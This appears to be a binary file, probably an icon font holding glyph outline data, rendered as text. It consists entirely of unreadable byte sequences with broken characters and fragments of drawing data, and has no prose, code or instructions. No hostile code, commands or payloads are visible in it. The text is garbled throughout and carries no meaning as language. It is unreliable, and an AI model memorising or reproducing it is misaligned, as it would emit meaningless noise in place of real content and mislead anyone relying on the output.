���S""%!��78%.'#"32>54&#533#3##"'5#53!,0#
0#;"2vv����r(M1#/cc��$.#;#.Y",�"#& �-<���S $'��:=%&'#"32>54&##5#535333#3##"'5#53!#3/$	$.#;"/+%**%+����q(M3"1bb��#$/4$#;"/]))&**.�$!##�-<
���S""%!��6'E%&'#"32>54&/&4?627623#3##"'5#53!$2/#	#0#;"*O0 @����q(M3"1cc��%$.5$#;#.*O0!?�$!##�-<
���S""%!��3654'!#32753654'#53654'#5�}�:cc1@1�����!%""�����'&� &#"���z r%.'#"32>54&''7'773!32767#"'&'&'&547#736?#7!7>54'.#"'>323#T,/$	#/#;#8       �
���1,
GO>63/(
B[�
0	-9%2(+(l2|A6;7+-Nq�#05$#;#0j       B
/*
 9"!25A+'BC,+!r-)!-.B;%C��zj%.'#"32>54&#533!32767#"'&'&'&547#736?#7!7>54'.#"'>323#T,/$	#/#;#2vv�
���1,
GO>63/(
B[�
0	-9%2(+(l2|A6;7+-Nq�#05$#;#0["B
/*
 9"!25A+'BC,+!r-)!-.B;%C��x l%.'#"32>54&##5#535333!32767#"&'&'&547#736?#7!7>54.#"'>323#R-.$	$.#;#0*&**&*����1,
GO>j-)B[�
0
,:%2(+(l2|A6;7W4Oq�$/5$"<#/\++%**B.*
 9 ! 33C.$BC-*(!r-)>_@9'C��z&x%.'#"32>54&/&4?6276'3!32767#"'&'&'&547#736?#7!7>54'.#"'>323#T,/$	#/#;#*O0!?�
���1,
GO>63/(
B[�
0	-9%2(+(l2|A6;7+-Nq�#05$#;#0,O0 ?�B
/*
 9"!25A+'BC,+!r-)!-.B;%C��@F37#654.'&#">32!3#332767'#"&'.54767!7#>�qN5T8;6A?;4lM,*<*
���[A3Qq<LIG5pX31Z�
0uC(8B]=/r"

(*-CB$/Ce@">m).
..
B���x%.'#"32>54''7'773#3#3!'7>767675#&'5&47673'#&'5&475673'46767632&'&#"`,4J
%4#:"J   �n�����4+��)	�~
te$$'78M>4.+	,#.$8
�J4%":#4T     �
	@
*
$*
0NH'
*

@

*2_&'

"&&	
���p%.'#"32>54#533#3#3!'7>767675#&'5&47673'#&'5&475673'46767632&'&#"`,4J
%4#:"Duu�H�����4+��)	�~
te$$'78M>4.+	,#.$8
�J4%":#4E!�
	@
*
$*
0NH'
*

@

*2_&'

"&&	
��� z%.'#"32>54##5#535333#3#3!'7>7>7#&'5&4673'#&'5&475673&547>7632&/&#"Z,.%
".";"C*%))%*�Q��
���4+��#	�}
seM68N>40)	
$%,$8�%4#";"5H**%**�
*

@

*

$*
0N?#)4*
@
.4-O
,($
"���%%.'#"32>54"/&?62763#3#3!'7>767675#&'5&47673'#&'5&475673'46767632&'&#"`,4J
%4#:"=M/ ?�?�����4+��)	�~
te$$'78M>4.+	,#.$8
�J4%":#4N0 ?�
	@
*
$*
0NH'
*

@

*2_&'

"&&	
��&Y%&'!67673764'5&'#'3>4&/#&54767>326767.#"#3#3!6764%����
��
8$3'
+[EP5:H$ds
}�

&8*$
 
*@+
+!(K`2?&!B2��~NYg%&'#"32>54&''7'77#&'&'.#"#376732767>326767364+"'53'563632%1.$	$/#;"7     �]15v<98$D{{)**
@$"_��)	���$$/4$#;#0j       �B)<"� # ��
*'96a 
ack��~FQ_%&'#"32>54&#53#&'&'.#"#376732767>326767364+"'53'563632%1.$	$/#;"1vv�]15v<98$D{{)**
@$"_��)	���$$/4$#;#0["�B)<"� # ��
*'96a 
ack��~NYg%.'#"32>5.##5#53533#&'&'.#"#376732767>326767364+"'53'563632-.$(3#;#/*&**&*�]15v<98$D{{)**
@$"_��)	���$/41&#;#0]**&**�B)<"� # ��
*'96a 
ack��~%T_m%&'#"32>54&/&4?6276#&'&'.#"#376732767>326767364+"'53'563632%1.$	$/#;")O0 @�]15v<98$D{{)**
@$"_��)	���$$/4$#;#0,O0!@�B)<"� # ��
*'96a 
ack��~(4B#&'.#"#33;2727332>767364+"'53'#56372{]b{<89&H||:y` _��
5 
�"�
>-9C�3��A;'83^aok!��r Uals%&'#"32>54&''7'77#&'."#3#33;27327232767>7676735#654'3%63632#+"'537#53M$2/#.#;"8     ;V	
czu8%JKKKK!:<J/
SLM�-

��!
�
���%#/5#;#.h       � :B�6M6�+6$7
j�BMM��rLXcj%&'#"32>54&#53#&'&'&'&"#3#33267232767>7676735#654'3%63632#+"'537#53M$2/#.#;"2wwV!059=u8$DKKKK5!:<J/
SLM�-

��!
�
���%#/5#;#.Y"� ;"�6M6�+6"7
j�BNL��sQ]ho%.'#"32>5.##5#53533#&'&'."#3#3267232767>7676735#654'3%63632#+"'537#53M-/#$.#;#/+%**%+V!01zu8%JKKKK 6:<J/
SLL�-

��!
�
���$.5/$#;#/\**&**� ;!�6M6�+6&7j�BNL��r&Wcnu%&'#"32>54&/&4?6276#&'."#3#33267232767>7676735#654'3%63632#+"'537#53M$2/#.#;"*O0 @	V	
czu8%JKKKK5!:<J/
SLM�-

��!
�
���%#/5#;#.*O0 ?� :B�6M6�+6$7
j�BMM��[-9DK#&'.#"#3#376732>76735#654'3%63632#+"'537#53ZV	dz<3$$DKKKK )*:wdTMM�-

��	�
!��L!9C�7L6�C9$7
j�
BkL��mq%&'#"32>54&''7'773#3!'767>7654'&'#&5&47473&/&54>7632&'&#"H%2.$#.#<"8      �����4+��mY$I79K=4-+	'2#�##041"#;#0j       �"+
+"0	/L
'8&#


2aJ

"&&

$��mi%&'#"32>54&#533#3!'767>7654'&'#&5&47473&/&54>7632&'&#"H%2.$#.#<"1ww�a���4+��mY$I79K=4-+	'2#�##041"#;#0["�"+
+"0	/L
'8&#


2aJ

"&&

$��mr%&'#"32>54&##5#535333#3!'767>7654'&'#&5&47473&/&54>7632&'&#"G#3.%.#;#0*%**%*�`���4+��mY$I79K=4-+	'2#�#$/41#;#0]**&**�"+
+"0	/L
'8&#


2aJ

"&&

$��j&s%&'#"32>54&"/&4?62763#3!'7>767654/#'&'&4?3&'&54767>32.#"E%1/$	$/#;")O/ @�[���4*��nY&#rK=4-+	$;3#8
�##05$#;#0,O0 ?�#"	 
)I*/K
8&) 
)+
!* 20.($0

&!+��W%4'5!67654'4'37>54'&'#'&'&54767676326767.#"#3!76?4����	
$-#$	+[CO58GXm2,"*$	

"

&&"G302 $,

#&8'
&����NW%&'#"32>54''7'77%7&'&'&'&=&75#&'6767#5!#6'5!!56�!0-$
	!-!8!H��#'3*U2
+ ;.N&!������)�!"4!!7!2Pvi $3'$$%.(3==
2;1&87'60EeV{��%q����DM%&'#"32>54#53%7&'&'&'&5'5#&'6767#5!#6'5!!56�!0-$
	!-!8!Bpp��#'3*U1
, :.N&!������)�!"4!!7!2B fi $4'$$%.&09H<2;1&96(50EeV{��%q���� NV%.'#"32>54&##5#53533%7&'&'&'&5'5#&/6767#5!#6'5!!6�*0&
	&0!8!-(#((#(��#%5+T1
, :'N&!������(�$,0$!8!,V((#((di #4%	#$%.&09H<3;0&96(5*DfV{��%q����$QZ%&'#"32>54/&?676%7&'&'&'&5'5#&'6767#5!#6'5!!56�!0-$
	",!8!:K-;��#'3*U1
, :.N&!������)�!$2! 8!2K.;
Xi $3'$$%.&0:H<2;1&96(50EeV{��%q��u-5%#.535!3676767>737>45!!76ng'=!�4�#)U2?"/5 [-1J$k��R�##'"���\mJ6:+:='2y@5>3)1('&?_e/.z���!(��%4&'&'#"32>'''7'7767&'2764'#"&'&5'632654'&#"#4/#'7&547'#"'&547'3276?#"''267654'6767&?$2/#
/#;"K     �+0"Z?!&$I/
3*	"3>.-7		+% ?T! *,"&4 
#Koh"'$# -+$'�.%$.#;   �=!"#>8/`R)F)#"=t
.&!+�a �?.�+G.	 	T�0#<ask20HM#%.1<3QU@9*.K#W.,0=%������%4&'&'#"32>'#532764'#"&'&5'632654'&#"#4/#'7&547'#"'&547'3276?#"''267654'6767&'67&?%1.$
/#;"Evv3?!&$I/
3*	"3>.-7		+% ?T! *,"&4 
#Koh"'$# i+0"�-+$'�0$$/#;"y8/`R)F)#"=t
.&!+�a �?.�+G.	 	T�0#<ask20HM#%.1<3QU@9*.K#W.,%=!"#=%��� ���%4.'#"32>'##5#535332764'##"'&'&5'632654&#"#4/#'7&547'#"'&547'3276?#"''267654'6767&'67&@#,5&
(3#;#D*&**&*1?!&$'#2*	+#2?/-7		+%!?T! *,"&3!
#Koh"'$# i++!
%�-4#�.#&.&#;**&)){8/`R'F("=s
.%!$,�_!�Q/�+G.	 	W�0$<aui	20HM#$.1<3ST@9*.K#W.,&<!#="!"���%,3�%4&'&'#"32>'/&?627667&67&'72764'#"&'&5'632654'&#"#4/#'7&547'#"'&547'3276?#"''267654'67?$2/##/#;"=O0!?Z+0
%�+$'(G?!&$I/3)	"2@.-6	,% 
?T! *,"&4 
"Joh"($# �.%$.+$#;@N0!?�=!!#/%08/`R)F)$"=t
.&!+�a �?.�+F/	 	D�0$<ask20HM#%/0<3QU@9+.K#W.,��Ov}�&#"27&'673#"'&54/#"&4732767674/#".54732767'&/&5467367&'673632&'7&'$B&5
H$% ?7 "'#!g7IT25#%!+	* *R?
 $+	
 6,-@0!�,!!,�+0�=u>"*F'T_09,/X$M-!(N-XP4=f�Z
@6$=$$NI	07#lta>%0(�0'
=	0G+�-C�$Y�+"%0��! H"##��1 Nc%&'#"32>54&''7'77.'&#"#3#376753546?#532767>4'7>32!4/#.";"7  U49-1/_^^^^##T�##26O6�)�##.5";#.h   Z1:

��?W>�� 9V
5e��
6I��1F[%&'#"32>54&#53.'&#"#3#376753546?#532767>4'7>32!4/#.";"1uuU49-1/_^^^^##T�##26O6�)�##.5";#.Y!J1:

��?W>�� 9V
5e��
6I��1Mb%&'#"32>54&##5#53533.'&#"#3#376753546?#532767>4'76372!5/#
#.";"/*%))%*
U49-1/_^^^^##T�##26O6�)�##.5%";#.[**%**H1:

��?W>�� 9V
5e��
6I��1&Ti%&'#"32>54&/&?6762.'&#"#3#376753546?#532767>4'7>32!4/#.";")N0!>U49-1/_^^^^##T�##26O6�)�##.5";#.+N0!?;1:

��?W>�� 9V
5e��
6I��0E%#532767>4'&'&'&#"##3#37675!64'276372'd�##26O6-(69-1/@R___
#$
:��)�V
5e�4/
��@W>��?�3O1��BQ%&'#"32>54&''7'77##"'&'&=46;267!&47!&+&54?!##3.$	$.#;"8     y�kLh-&o
�t	FSg
��$�m/�
�#$.5$";#.h       /YqO{
.L�zO	
63/F!0(1��BI%&'#"32>54&#53##"'&'&=46;267!&47!&+&54?!##3.$	$.#;"2vv$y�kLh-&o
�t	FSg
��$�m/�
�#$.5$";#.Y"	/YqO{
.L�zO	
63/F!0%4��C R%.'#"32>54&##5#53533##"'&'&=46;267!&47!&+&54?!#,/$.";#0*%**%*&y�kLh-&o
�t	FSg
��$�m/�
�$.50";#.[**%**/YqO{
.L�zO	
63/F!0%4��B(Z%&'#"32>54&"/&4?62762##"'&'&=46;267!&47!&+&54?!##3.$	$.#;"*N/!?.y�kLh-&o
�t	FSg
��$�m/�
�#$.5$";#.*O0!?�/YqO{
.L�zO	
63/F!0%4��6&'364'!32!!+";276'&'>73654'�
���m�$��
gSGt�
{	�mk�yS2'0	%F 36Oz�
�sqY ���	o%&'#"32>54&''7'77''&76'5"'"/354'&/"/&47336#7676?#.'&7>76�$/-#
	#-!9"6R4F	;P�c0
	J�
>W"	$	�)'+r082$;X�##-1""9!-e�R68.u#*5ib	L�"?%3	,Z?		#�(+Aj40#(@>A���i%&'#"32>54&#53''&76'5#"'"'&/35&'&/&#/&4732236#7676?#.'&7>76�"1.#!."9"1ssq5F	;Q�b%
 �
>W
#

�)P7#'182%<X�"#-3/!"9"-W!�S68.v#*;xO"�$ >$4	-Z@	
�(+ '-840$)@>A��� q%.'#"32>54&##5#53533'&'&76'5"'"'&'354'&'&1/&4732236#7676?#.'&7>76�+-#
!-"9"/)$))$)s5F	:RG{11
	#'�

>W" 	�)P7#'182$=X�#-2#"9"-X))$))�S68%:#+;wO	#*�"?&2(PO	�(+ '-840#)@>A���	&v%&'#"32>54&"/&4?676''&76'5"'"/354'&/"/&47336#7676?#.'&7>76�$/-#
-!9")L. =�4F	;P�c0
	J�
>W"	�)'+r082$;X�##-1"9!-)L. =�R68.u#*5ib	L�"?&2,Z?	

�(+Aj40#(@>A��hI.3'&=3'&'&"'56'4'&'&'&+32#337676LY=%382t,R�
!) "Y?	�$2e��L#U?B*$15mBQ�)	A[.
6%@ "�'	Qy<+$y06�V��� U&'#"32>54&''7'77+'#"&'?6='?56?%776767j%2/$0#<"7       *		g� B'

����!%���b7?a#$/5"<#0j       ��
k@�8 7�/��P�IH�B��F$���M&'#"32>54&#53+'#"&'?6='?56?%776767j%2/$0#<"1wwP		g� B'

����!%���b7?a#$/5"<#0["��
k@�8 7�/��P�IH�B��F$���T&'#"32>54&##5#53533+'#"&'?6='?56?%776767j%24(
'5#;#0+%++%*Q		g� B'

����!%���b7?a#&/5%"<#/\**&**��
k@�8 7�/��P�IH�B��F$���'\&'#"32>54&"/&4?6276+'#"&'?6='?56?%776767j%2/$0#<")O0!?\		g� B'

����!%���b7?a#$/5"<#0,O0!@��
k@�8 7�/��P�IH�B��F$��l654'?4&?5&/77363676767�!�
�����!%����=�iZV
�8	�^A�HI�P��/�7 8�A��
�o�	��\_cfjmq%&'#"2654&''7'777#&'&#"#&#"#&'&#"#3#332?332?&5467#7365'37#'37#73'37#'3�&)R:,EE5YBBT6)!ECP	Yf2 &6n3-%&	S��	
-<�#	@	�2	B�$(:)$Q�&��&��&��
'
&	(	���X!)$=&
�3:&�Ha&&z@:&	��TW[^bei%&'#"2654&#53'#&'&#"#&#"#&'&#"#3#332?332?&5467#7365'37#'37#73'37#'3�&)R:'[[EE5YBBT6)!ECP	Yf2 &6n3-%&	S��	
-<�#	@	�2	B�$(:)$E�&��&��&��
'
&	(	���X!)$=&
�3:&�Ha&&z@:&	��^aehlos%&'#"2656&##5#53533'#&'#&#"#&#"#&'&#"#3#332?32?&5467#73656''37#'37#73'37#'3�&)
S9%    EE5YBBT6)!ECP	Yf2%&6n3'G&	R��	-<�#	@	�2	A�$(:)$G  !!�&��&��&��
'
&	(	���W!)$='	�3:&�Ha&&z@:&	��%hkorvy}%.'#"2656&/&4?6276'#&'#&#"#&#"#&'&#"#3#332?6?32?&5467#73656''37#'37#73'37#'3�
#)R9!<%	1EE5YBBS7) DCP	Yf2!
	6n3!R&	R��	
-<�#	@	�2	B�
$(:)$!=%	1	�&��&��&��
'
&
'
���W!*$<&
�3:&�Ha&&z@:&����>CFKNSV#7364'#'&#"#&#"#&#&#"#3#32736?32?364'%3#/#73#'37#733�@
YKL% :aH"
G\;-#JIX	ap6$:
;y7,K$7r��<6	�'�8	0�KE
�
*B��B��B��
+
*
+����+
***?P�**j7w**@F��rU%&'#"32>54&''7'77&#"&#"#3#33272753>7#5365654'L#2.$	$.#;"7       ��6)-2��2,08���:"[��##/4$";#.h   Fz��S��	(	V
'	�� 6U	!��rM%&'#"32>54&#53&#"&#"#3#33272753>7#5365654'L#2.$	$.#;"1vv��6)-2��2,08���:"[��##/4$";#.Y"5z��S��	(	V
'	�� 6U	!��rU%&'#"32>54&##5#53533&#"&#"#3#33272753>7#5365654'L#33(

'4";#0*%**%*��6)-2��2,08���:#\��#&.2%";#.[**&))3z��S��	(	V
'	��!5U	!��r&X%&'#"32>54&"/&4?6276&#"&#"#3#33272753>7#53?4'M#3.$

#.";"*N/ ?��6*.0��2,08���:#[��#$.2%";#.*O0!?$z��S��	(V
'��!5U��Y7%#&'&476735#&'&476736326323#3##"'&'������80,2��2,*6ѩ���:n(	U	(	z��S��	V	��g�[ $6'&'&'&'5&6767676'!!�&7�w+-0/@�<
"�X�
� 
	

/�!2#


�j"R!"3!2654&!!���!��R�h����j RSg"=4&'./&'.+";2676?6767>=763276=4'&+"4;26=4&#+".=4>;2
	
;'�';
	


<'�'<
	
	
%@%�%@&&@%�%@%�!:	F $--$ C<#��#;	S $--$ U	:!
-33�%>%%>%�%?%%?%	����,<EU`n3#"264&3#!!2?6#!"3!2674+"&=46;2'"&4627+"&=46;2%'&764'7'&3?6c00

#00o���p��
[
�1NN5,NN�"��R(B6)6*�5X
�6ni��sn��
���		R. , .�		S{#��T+C6)6+�j�R{32673264&+.+%#";#!532>=>=4.+";+.+"#"&547>;;5#"#&;;267!2>5>=4.f>i
i>�3I.N.���(E(64J1"�
	.

�"12
??-8+(E(�
.@l@6�

=2H1g�<.N.Z(E(s�62H1gs"1


K0"#V)8��(E(K

@l@��6�j�R&"2764'7/77VA�0"�<��Š�(!(!)!��0!!��A��Š') (6!(!���1AJSlu%&/&'&'#'&'&/#'"3%26=6+"&=46;2"&>"&462";>7>?564."&462�

!0@

$3Q7 +0
pp����U
R ��%>% "'!%>%'77N77Z'+(	".0'8#K
  E*2�|%�%�1*m$$
���]�R#s�����%"264&'"264&"264&'"264&&'.54&+"&46;26=4&"+";2#&'&'&'&673277>76%#"&=#"&46;546232"&462'"&462"&462'"&462/		

		

�

		

		610y:$)"6&�""�

�&77&�"!(#9x/10	I9@�0772=1�A:J	�\C

C

C

C		H**�))|



�



v



�



GXEB=
	;&7"1#C

"7M6#2	
>BD�SRrQQRPrQS9C

C

D		D

v**�**�**�**
��Of{�������236263723632&'.'&'&'&'.#&#"&54?>76'&6767636"7276?64/&'&3"&76232654.'67676'54&#&;2=&76'&/&"264&'64&"74&"26'264&"'224+"3a	%6m*M6	M"-
3&
	%
$!J2#%'4+�

	w

g

	�*
���
Jn*F*#0%�$
##+
"2
6v3` #	�

L	
�
	



		

X���i�R(1:\%.#&+""!2767>##5#53533"&4627.>223#"353265654&#!5#�PwCI�1b15!M74,5U~�&Ff-��iHkjHj�!//B00�"//B/0�
��	�k�(("��k�Bj>53�HK;\c�kjGkj�0A0/B0�/B/0B/3G	%#&9r!G"C!��������%"'."5&/&/&'&""/&'.#"5'&/&'&+";2676?6?463>?676?6276?4236355&3>=4&+&76#&"36=6'&4'&'7>5&7�	
	&$	
			�L""��^OM-/#U!#$"K�b�_�!$"5FQ"�	

#+

	

 $	
	


!	M	�	��76QS^G�k""!�"$�a:>c�# � "Gd�C���
�

	$���d�SK45&'&'.767>&'.'&'.'&'.67>7>76&7654
 �pav06-}	D!I,DB	�D?&	..$%�l5!/'X51	<>#7][
D"8,ke
dbƤ�8U!4:�1'`S0'dq@;]	Z<2'A+ ����5D55&3>=4&+&76#"36=6'&4'&'&'7>5&7""��^OM-/#79!#$"K�b�`�M$"5FQ"N	�	�� 
76QS^G�k""!�"$�a:>d�# gh "Gd�C���	
�

	$�j�RJ737;26=4&+"'&732654&+676762#";2654'&'&'&"N*bMy�

�e;P9P30OQ�QO12T�>;cf�eb<>
5m/%

!V7^QP.00/OQ^��
7
wgd<==;cgv
������5&'&'&";5>54&'676762326=4&i32TV�WT14$4%G
&%>@�@>%&
G%5%]jZX3553XZj	3!�(::
OCA''''ACO
��
9)�!4�j�R'!"3!2654&#!"&=!%!!5463!2���"#x���K��6xR��$#�R:�����*.&'./#;27>'!"3!2654&!!��%("-#'$@�J
�
�g�
PP�	��.

��
�jkR!"3!2654&"&462%!!D�`���	



"��YR�h��.

?>�j�R(,!"3!2654&46;2+"&5"&4627!!���''Z''�::-$��p�R'��''b'7��$%s��j�R )!"3!2654&".4>2!!"&462�b		�	�,I++IWJ++J���ph/B//B/R
�B
	�
��+JXJ++JXJ+���V"//C//�j�R!"3!2654&"&4627!!���++l++�(�H�R+��++T+�A((������,<@DHLPTX\`dhlptx!"&/&76?67676&'!"3!2654&#!"&5463!23#73#73#73#73#73#!!75#3#%3#73#73#73#3#73#��J*$1)"
�T��f���VVUU�VV�VVUUVV�Y��T�VVUUVVUUVV~UUVV�
(!>$/5'	
�W
��6�:GGGGGGGGGGG�H~GG6H�GGGGGGG6HHH�m/?O_o��������
-=#";26=4&#!"3!26=4&!#";26=4&'326=4&+"!326=4&+"!326=4&+";26=4&+";26=4&+";26=4&+";26=4&+"326=4&+"7";26=4&#3";26=4&#3";26=4&#3";26=4&#3";26=4&#3";26=4&#3#";26=4&7!"3!2654&#!"&5463!2Zhh��N��&hhl__^qq�-88a99c88b99a99�99b9%9&9$9&9%8_99y�:

�



�b

�
999999�99999999999999s99L9999999	9999	999�
�

�
������$(,048<@DHLPTX.&'&76'&/127>''7'''7'''7''7'7''77'%7'77'7����$%
���r�B'AC(A(?B(BC(A(9A(BA(AA(AC(A(nA(AA(A='%',(A(,(A(^�'$
(#���~y'A(mA(A�(A(mA'A�(B(,(A(�(A(mA'AD(A(,(A(j@�?A(AB'A��/37!2654&#!"463!2#!"&5!"3!26=4&#53}��3z��1�2��f��������\##$
�g $(%4'&#!"#3!26=2"&46#53%!!X
�z
R
�J	<tt
�s����V�		�$ ��r07!2654&#!"7!!5#!+"&=!5##3!26=|��	�
��	�
��a�}��A�#�<%

�j�R#GMt.'3676767>'&&'&'&'&'&'&5&7>7"2646?&'."'&#"26267>5'.��mk|-;\�;+-9aX8,wgh|�




		
			�JUUKI��F
9,) /$8)K33'�����F'33(, ",),9
E���OQFI���4	

����326=4&+"&=4&+"&=4&+"+"=4&+"+"&=4&+"+"&=4&+"+"+";2+";2+";2+";2;2;2=46;2;2=46;2;2=46;2;2=46;26=46;2=4+"&=4;2=4+"&=46;2=4+"&=46+"&=46;2#";26=4&C``O?,?,@,?O````````O?,?,?,?O``````���<tt?N]]]]]]]]N@-?,?,?Q^^^^^^^^Q?,?-@,���*tt�j�U	LY.'6"'&5&7676767.'32767>767632>/&'&.>&gr�%L^_��,+#%)+#%($
�9W��@/& (' #L!"cf4)+=w�&^_&
6Ui9%��r&_^L%��#%	


gW9�K;:/CR*5;1a�&%:iT6
&_^��]HXi%&'&'&'&7>327676?6&'&/&#676?67676>'&6.'&66&'&'.7<?N=:@- &(
(�?HCT��	 %L!!%,>>B5	6)+0
Q�	.	
�Q
 ,t/1\&	3)".
'*	j6;8
$N
��
%O"),-*,[

�&\O
yO=Vx
	$UQ)#����%!!#!5#5!!�ܟn����Pp��zy11yj���j�V6BOW4#'&4?6?676'&'&'&2>54'&'&476767&'&'".=3275

!
	
?47"Gz�zG# 84��-+3;;)"�:ctc:rrn\UfO39u%


(+8��FxFFxFE<-)�)!���9a99a9�! 4 -"(B�e~[0B��#&&'.+"&5463!21326=6&#!"7?64/&#'#".>76;26&'&56'54'.'#&7676".>'IDC(� #$V"#���L~

�	�7 
1;-	24#-{ $$O:!%2%G485$%��),3+D��9$
%!:#$!���� 
I
K!
1a1F7F(+7'01 Lk\��!'0&W'),;0aH��30,<	������2:CGKT]fo%&/&'&'&'654&'&#!"2763!23676%##7#73'"&4627!!!"&4627462"&"&4627"&462�


�	

	f��%(%n"&cx"��!	









$




 6R<n'

'��<Z-!|Z��2�+I#!�h�R:Snw����!7CLUZciy}�������������%676?6767>76375%'3&547560'#&/"'0154+5301565&#'54/&/542325#'&=4/542=43%264&""&462&/.'&'&/&4#&#&"#01++"&57#"'#"4#&"676?67676;2?7>54%462"&5"&462"&4627"01#56;2=4+"=32#&70#"+5432=46;7462"&5"&4627"&4623#0#015%#326=4&+"3#&;2=4'%3'"264&''7'77'3#%?6=4&+"%"264&7'&+";2?6%"264&#53%#";26=4&264&"�

+(	��8�	��




1

+	x
,		
	
%m%	��
	D%%4%%7
;+
0
		
C%%3%$��A�?x���B;�xx��??�C	

				2��g




��
7

��
F#:�P�`
+EZ
�821

@		@
28
%,, �d&5&&5&@!
��@&5&&5&s<������B@@�(�

8G							1+
�@%1:FJV_hq!"3!2>=4.2"&462"&46%53533##5"&462"'&'76;2%!!#1>;27"&462'"&462"&4627�z0Q00Q0�0Q00Q	

 ��%%&&%L  #&	s��lG$	&

	

#



@0Q0b0Q00Q0b0Q0u{!!S%))%%%z �
8[�x�

R

(�jR!)5+".=#3#!5#527676=##"!.;2>5!�7X.?.X7?%$:;>���>;:$%?�>0G9H�":"?":"��0/[88[/��@=;%&�AA�&%;=@�_A00A��#<##<#���"2>KXfo!"&67%3264&"+"3!2654&5463!2#!"&+"=4;2+"=4;2+"=4;2+"&=4;2.462`��j%%4$�2
��V��-NFM�(89O89��
$4%%��������������8O99P8�j&R,!"'3!26754&#!"3!265%#"&546;2����"����	

		

z

OS��}
	o	

	��	
�j�R'+!"3!2654&32+"&46#"&46;27!!���#11#i#11��__WLL��*�R1#��#11#@#1�O

7:��#!"3!2654&'535#57'535#57%!!�E


�	

�				���n�
��


R

��
����t�m[?676'&'&/&'&'&'&'&'.'&'&'&7>7>767676&=476'&'&�7.
4-	

	j<<
	& 
8:Xڵs.
%&	B%P1/N��?@V+].1K
&"	l+!*)1,% 0

Z<=@];�='#,5A1'1={=W>;+<gGz�|%=Obx��������%"#"&5463!2#%232>'4&'""3454&#&"32651326=4&'#3!;>75.#&#3%"#&";2656.#&%"#"264&2326=6&"7"#"364&232675&76&"23>=6'4&#&"#&7454&#&"3662326=6&"723>=.#&"#&%"#"264&���%))%O!**!�WXW�w([#$%"�5j�5$H�|H<o		>�	�5	>C		
�

	W	>�		��*>@*%�%**!�Y *k(
)-, 3�%"$#�$!�?n>n"?n>�
>8	
>%>�(>�i�S+4AX!"3!2>54.2"&46".47>2"&462"2>4.2&"'&'&'&>'��55g66�$$4$$FJ}I%$}�|I%$}�%%3$$��=g<<gzf<<g</Q3 
,3QR5��555H%4$$4%�I}�?=II|�?>Ie%3%%4$v<fzg<<gyg<&-N./M-�t�H&6Oi%#"&54&"#!"3!2654&"&462%#!"&=463!26322?64'.#"2%&'&"27>22?64dc!. ��V		�5'K�O��'53(?$Y152,?�8HQ�PH8>,oxn,>�  �����'&
		C�!> !=�3!"3>(*)(>�_(4=AJS\en!"3!2>=4.32+"&46462"&##5#53533"&462%!!"&462"&462'"&462"&462'"&462b�$$>$$>$�$>$$>������{&&D	

��27$#_$>$�$=$$=$�$>$cs&��



JN�(O'b�j
R!3#'535#57'53'577!!�1��XX%(####� �R���g<C �jPR/##1"&5'.=4675#"2767654.���*G*0.NR�RN.0*GR_	"k"	��
#k"	_*G*�^RN.00.NR^�*G*�j}R=IV_j������"264&72656=#&"264'.'5'5#;27676?7'57'3"/"&5"&462"'&462'2?332?4/52"/#"&4?63"10#52?64&#"&4637'57'57'"&462'"264&'2?5#-1VJVN%`X


		
-*/		



		

�Xk�ad		����h	��**�	
&	:			
�'&"4&+"'&"27645�
Z

6
f6�`


���6��
 �!764/&"2?64/!26=4&	���6��
6�`


��5����5�
Z	
 �!'&4?62"/&4?!"&=46�W�6
��6���


��5����5�
Z	
�%"/&4762"/+"&�6
5�
Z

IW�6
��6���


���	!	7	��������&&Xl��N��I��/���	!!		>k��g��/��IVl����@@���
!!	7	���k��/��I����l�$&&�������	!	'	>k����@@��l��/��I���� )2%"/&"2?64/&"'"&462'"&462'"&462�
�%�
�&
:0E11E0#2##2#$$��&
��
&"11E00|##2##^$ - )2&4?64/&"2?64'7"&462"&462"&462E�&
��
&k0E11E0�#2##2#f$$S
�
%�
�&
�"11E00###2##$!- )264/&4?62"/&4?"&462"&462"&462��&
��
&<1E11D2�#2##2#�$$S
�&�
�&
�"11D11"##2##$�� )2&""/&4?62"'"&462"&462"&462�
�%�
�&
:1D11D1#2##2#$$
�&
��
&"11D21�##2##�$$�%76&#!"2����(����76/&4j�������(��'&?64}�������($�#!"&?62����(�����,276764'&'&"762"'&4?622?<:cf�fc:<<:cf�fc9<��;����;�^wfc:<<:cf�fc:<<:cf��;��(;����,"276764'&'&"'&4762�wec:<<:ce�fc:<<:cf��;��(;�<:cf�fc:<<:cf�fc:<�3�;((:����,276764'&'&"'&4?62"/&4?64?<:cf�fc:<<:cf�fc9<��;(��;�^wfc:<<:cf�fc:<<:cfk�:����;����,276764'&'&""/&4762"/&"�wfc:<<:cf�fc9<<:cek�;((;�X<:cf�fc:<<:cf�fc:<��;(��;���''77'�9��:��:��9�Q9��9��9��9���U+:676737'#.'57'7#7'7'377'4673'.�}
��
}�(z
��y(�}
��
}�#
\\>W{��$
"#l	z
��z(�~��~�(y��
z(��Q��8&%!%'#��/64/&"2?64/&47&4?64/&"2?64'���
b�c��*4����3�$�4����3��/&4?62"/&4?64'64/&4?62"/&47���c�b��*4����3�$�4����3!�'&""/&"27%644��3�cc��X�2?64/&4?64/&%��cc�����3��4X�2764'&"�cc���3��3�%&"2?622?64����4��4-��cc #,5>GPYbkt}��"&462#"&462#"&462#"&462"&4623"&462%"&462"&462'"&4627"&4627"&462!"&462!"&462#"&4623"&462#"&462��fhL����K��6V�K�hX���YXY��#,5>GPYbkt}��264&"264&"264&"264&"'264&"5264&"264&"%264&"264&"7264&"7264&"264&"264&"264&"5264&"264&"�X���YXY�fhL����K��6V�K���#,5>GPYbkt}��"&462"&462"&462"&4627"&4625"&462"&462%"&462"&462'"&462'"&462"&462"&462"&4625"&462"&462�X�
YXY�fhL����K��6V�K� #,5>GPYbkt}��"264&#"264&#"264&#"264&7"264&3"264&"264&"264&"264&"264&"264&!"264&!"264&#"264&3"264&#"264&��fhL����K��6V�K�TX�
YXY B'%'7�A��A�X��A��BA��A䣣�A�� B7%7'<A��A���A��BA��A䣣�A����%'7/7'�:��9��9��9��9��9�9��9��$^n&/&'.#'"76?>6=7>6765?>656454>2>565&'&%!26=4&#!"	

��	
(P7!"/&% ���('
	<9
#E/"
��!#�J0<]W
	\\��%%���4."/5..=4'.&'5'6732?64/&"#&'52?64/&"2?#764/&"2?64/3/&362676?6767674
 !y2dd/x	2dc/	x/cc3z	Dd1
nn	

9
Ll42\	�2cd/
z3cc/x	/dd2	��9T*	':$	���'Wl�4."&/5..5'54'.".=4&"/&322?6765234."7&54>2763&54>254&'&"6'"#$-	KAD!
